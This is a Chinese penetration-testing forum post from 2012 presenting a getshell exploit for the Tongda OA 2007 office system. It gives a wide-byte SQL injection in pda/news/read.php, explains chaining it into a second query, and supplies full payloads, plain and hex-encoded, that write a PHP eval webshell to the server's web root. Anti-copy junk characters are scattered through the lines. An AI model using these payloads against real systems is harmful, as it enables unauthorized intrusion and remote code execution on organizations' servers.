找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 通达OA2007版本漏洞及getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2509|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本2 U) x! i& @9 o) E5 f. v7 }

& P7 i' a/ `) [; u& N: x1 y 0 Z* l: ~8 E1 h2 G
Office Anywhere 2007 网络智能办公系统
. Q" X6 s( b/ p6 h& f; I! ^( {5 Q' d # P0 B! k9 c9 ?9 u. H" X& J0 V
http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..# d. {- M0 ^, _" `( |
+ u. T1 r! S1 V0 q

; H, M3 I, C: \这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的5 {# F& t/ \0 d# t; V

- Z  N( c' L5 \) B, o* d例如:SELECT * from USER where USER_ID='{$USERNAME}'  5 d! j- `8 I0 p
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了, p( T4 J1 r7 _/ @
) D8 s/ d( U! z9 O2 B! @9 @" y
这个时候我们是不是可以组合起来使用哪?
1 w2 L! b' ]# h  c8 @7 D) f
6 Z, O* s$ g4 |' V8 H2 Q第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
. j* V" s6 U5 j. R& \1 Uunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
, \+ m; B  d* M7 Y4 i5 X 6 y# M) U9 S1 r- a9 e7 C* O& X
这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了" c3 H' F0 @6 N2 f0 n% Q+ d
" B0 R2 v+ [1 b: e: h8 D
那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
' z' O: k7 C* f) |8 I % M$ L7 Z; }) Z$ k2 U
那么我们用字符串格式带入进行hex编码
; {+ N9 Q5 ]; V8 V- `2 V - G2 h0 M7 M, [4 X
%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
3 H. o9 W/ Z% t( {! g / V# u' }: h& H9 ~+ \' S% p
测试ok,获取oa的webshell
/ M: Y" T, E0 K! ]% |/ E9 f/ S  Y
1 y- t2 K' O1 }7 p! ` ' l5 Q/ g: s- i* D
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23/ r7 `' Y4 k* B! Y
直接getwebshell
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表